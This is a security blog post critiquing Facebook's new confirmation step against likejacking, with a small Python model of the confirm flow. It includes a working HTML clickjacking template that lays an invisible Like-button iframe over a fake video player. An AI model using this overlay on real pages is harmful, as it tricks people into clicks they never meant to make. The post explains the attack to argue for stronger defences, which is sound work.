Approximately two weeks ago, Facebook deployed a new security countermeasure intended to alert users to the scam tactic known as “likejacking.”
Likejacking is a technique in which a spammer creates a website displaying a fake YouTube-style video player, or some other visual lure, and convinces you to click a button to perform a seemingly normal action, such as playing the video.
What really happens is that you are clicking a Facebook “Like” button that has been made invisible and layered over the images, a web coding technique known as UI redressing.
In the past year, many attacks against Facebook users have exploited this technique. Part of the problem with clickjacking/likejacking/UI redressing is that the transparent, layered frames it relies on are legitimate features of HTML and CSS, so browsers cannot simply forbid them.
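The hidden-button trick described above can be sketched in a few lines of markup, embedded here in a small Python script so it can be printed and inspected. The image file name and the SPAM_PAGE placeholder are hypothetical; the iframe-based Like plugin URL reflects Facebook’s embed style of the time.

```python
# Minimal sketch of a likejacking page, for illustration only.
# The decoy (a fake video player) sits in the normal page flow, while an
# invisible iframe containing the real Like button is positioned directly
# on top of the fake "Play" button, so a click on the decoy actually
# lands on the Like button.
LIKEJACK_PAGE = """
<div style="position: relative; width: 640px; height: 360px;">
  <!-- Visual lure: a fake video player with a Play button -->
  <img src="fake-player.png" alt="Video">

  <!-- Real target: the Like button, made fully transparent and layered
       over the decoy so it intercepts the click -->
  <iframe src="https://www.facebook.com/plugins/like.php?href=SPAM_PAGE"
          style="position: absolute; top: 150px; left: 280px;
                 opacity: 0; z-index: 10;"
          scrolling="no" frameborder="0"></iframe>
</div>
"""

if __name__ == "__main__":
    print(LIKEJACK_PAGE)
```

Because the iframe has `opacity: 0` and a higher `z-index`, the victim sees only the fake player, while the browser delivers the click to Facebook’s real button.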
We have been urging Facebook to require a confirmation popup when users click “Like,” warning them that they are about to Like something, so that they are aware their click may have been hijacked.
Facebook has responded by implementing a new system that is designed to detect anomalous “Like” patterns and require an additional confirmation for pages that trigger this mechanism. While precise details of how this system detects malicious “Likes” are not available, I have seen it in action and it follows many of the suggestions we have made.
A page that triggers this behavior displays a normal Like button at first. When you click the button, either intentionally or, in the case of clickjacking, without realizing it, the button changes to Confirm rather than instantly Liking the page.
If you click the button again, a popup message appears explaining that you are about to Like the page. Crucially, this popup opens in a separate browser window: because it lives outside the attacker’s page, the malicious website can no longer overlay or restyle it.
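The two-click flow just described can be modeled as a tiny state machine. This is a hedged sketch under my own naming (`LikeButton`, `click`), not Facebook’s actual code; the anomaly-detection decision is reduced to a single `suspicious` flag.

```python
# Sketch of the Like -> Confirm -> popup flow for flagged pages.
class LikeButton:
    def __init__(self, suspicious: bool):
        self.suspicious = suspicious   # page flagged by the anomaly detector
        self.state = "like"            # "like" -> "confirm" -> "liked"

    def click(self) -> str:
        if not self.suspicious:
            self.state = "liked"
            return "liked"             # normal pages: one click Likes instantly
        if self.state == "like":
            self.state = "confirm"     # first click only arms the button
            return "confirm"
        # Second click: open the confirmation popup in a separate window,
        # outside the attacker's page, where it cannot be overlaid.
        self.state = "liked"
        return "popup"
```

For a flagged page, the first click only switches the button to Confirm; only the second click opens the out-of-page confirmation popup, so a single hijacked click never results in a Like.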
The technical approach to solving this problem is valid, but Facebook’s detection algorithm only seems to work in rare instances. Since the deployment of this technology, I have only seen it trigger in a few likejacking attacks.
Trying to anticipate scams from user behavior is difficult, if not impossible, and large numbers of users will already have fallen prey to a scam before the algorithm designed to protect them triggers.
Rather than allowing undetected fraudsters to continue to fly under the radar, the ideal solution would be to provide the verification popup whenever a user wishes to Like a page.
An additional problem is that the warning message displayed does not adequately alert a user that they may be falling for a scam. Many of these scams inform the user they must Like the page to see the salacious content.
Simply confirming that the user wishes to Like the page does not give them any good reason not to. Why not tell users that Facebook suspects this page may be malicious?
It’s encouraging that Facebook is working on this problem, but their solution doesn’t go far enough.